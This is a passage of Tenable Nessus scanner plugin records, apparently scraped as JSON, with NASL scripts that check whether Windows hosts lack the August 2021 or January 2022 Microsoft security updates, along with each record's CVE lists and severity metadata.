"CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009619.NASL", "href": "https://www.tenable.com/plugins/nessus/156626", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156626);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21867\",\n \"CVE-2022-21870\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21880\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\"\n );\n script_xref(name:\"MSKB\", value:\"5009586\");\n script_xref(name:\"MSKB\", value:\"5009619\");\n script_xref(name:\"MSFT\", value:\"MS22-5009586\");\n script_xref(name:\"MSFT\", value:\"MS22-5009619\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009619: Windows Server 2012 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009619.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850, \n CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, \n CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21862, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, \n CVE-2022-21908, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009586\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5009619 or Cumulative Update 5009586\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009619',\n '5009586'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009619,5009586])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005094 or cumulative update 5005099. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005094: Windows Server 2012 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005094.NASL", "href": "https://www.tenable.com/plugins/nessus/152421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152421);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005094\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005099\");\n script_xref(name:\"MSFT\", value:\"MS21-5005094\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005099\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005094: Windows Server 2012 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005094\nor cumulative update 5005099. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005094-security-only-update-276b95ad-c923-454c-8758-5b90175d86cc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed9c2c14\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005099-monthly-rollup-34a20feb-f899-4d10-91e0-d5ab32c4e009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9af3c64c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005094 or Cumulative Update KB5005099.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005099',\n '5005094'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005099, 5005094])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:18", "description": "The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005040.NASL", "href": "https://www.tenable.com/plugins/nessus/152422", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152422);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005040\");\n script_xref(name:\"MSFT\", value:\"MS21-5005040\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005040-os-build-10240-19022-e8bbfa7a-1012-4e18-a2d7-8ae6a8acf8fb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cab780fc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005040.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005040'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:10240,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005040])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005106 or cumulative update 5005076. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005106: Windows Server 2012 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005106.NASL", "href": "https://www.tenable.com/plugins/nessus/152433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152433);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005076\");\n script_xref(name:\"MSKB\", value:\"5005106\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005076\");\n script_xref(name:\"MSFT\", value:\"MS21-5005106\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005106: Windows Server 2012 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005106\nor cumulative update 5005076. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005076-monthly-rollup-bf677fed-96d9-475e-87c1-a053fa75fef7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e0382f6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005106-security-only-update-d1ab5a34-55c1-4f66-8776-54a0c3bf40a7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57da6a50\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005106 or Cumulative Update KB5005076.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 